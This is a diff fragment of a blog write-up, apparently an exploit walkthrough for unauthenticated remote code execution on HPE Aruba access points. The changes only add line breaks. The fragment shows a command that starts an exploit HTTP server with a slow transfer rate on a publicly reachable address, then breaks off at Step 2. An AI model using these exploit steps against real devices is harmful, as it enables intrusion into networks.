zzcentury/zzcentury.github.io/blogs/HPE_Aruba_AP_Unauthorized_RCE.md

 python exploit_httpserver.py --exploit_http_server_ip=10.0.4.54
 ```

-exploit_http_server_ip is the ip of the http server server,the value must be a server address accessible to the public network
+exploit_http_server_ip is the ip of the http server server,the value must be a server address accessible to the public network<br>

-This step is to start an http server server with a slow transfer rate
+This step is to start an http server server with a slow transfer rate<br>

 **Step 2:**  Open a new command line terminal under the exploit file and execute the following command